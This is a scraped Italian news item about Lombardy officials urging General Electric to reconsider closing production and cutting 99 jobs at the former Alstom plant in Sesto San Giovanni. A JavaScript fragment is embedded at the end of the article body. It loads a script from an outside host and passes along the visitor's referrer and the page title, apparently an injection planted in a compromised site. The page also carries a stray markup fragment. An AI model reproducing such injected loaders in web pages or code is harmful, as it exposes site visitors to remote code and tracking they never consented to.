"/>
lunedì 21 agosto 2017 12:18:22
omnimilano

GE, TAJANI: PRONTI A INCONTRARE LAVORATORI, AZIENDA RICONSIDERI ATTEGGIAMENTO

19 ottobre 2016 Lavoro/Sindacato, Politica

“È auspicabile che, a fronte dell’impegno del Governo, di Regione Lombardia e delle amministrazioni locali, General Electric ricerchi soluzioni che garantiscano la continuità della produzione e del lavoro ai dipendenti”. Così l’assessore alle Politiche per il Lavoro, Attività produttive e Commercio commenta il presidio dei lavoratori dell’ex Alstom di Sesto San Giovanni in Piazza della Scala questa mattina. “L’atteggiamento di Ge la quale ha confermato la volontà di chiudere la produzione e l’esubero di 99 dipendenti, nonostante l’impegno delle istituzioni a ricercare una soluzione condivisa e quindi senza accettare il confronto nel merito, è irrispettoso nei confronti delle istituzioni e ancor di più lesivo nei confronti dei lavoratori”, secondo Tajani: “Per questo – conclude – dopo aver sostenuto le azioni dell’amministrazione di Sesto San Giovanni e della sindaca Monica Chittò, insieme al sindaco Beppe Sala ci rendiamo disponibili a un incontro con i lavoratori. Con ciò è nostra intenzione invitare l’azienda a riconsiderare il suo atteggiamento, a sospendere i licenziamenti e a verificare soluzioni che permettano di mantenere l’attività produttiva in loco, anche in virtù della collaborazione che le istituzioni, ai diversi livelli, non hanno fatto mancare”.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Condividi questo articolo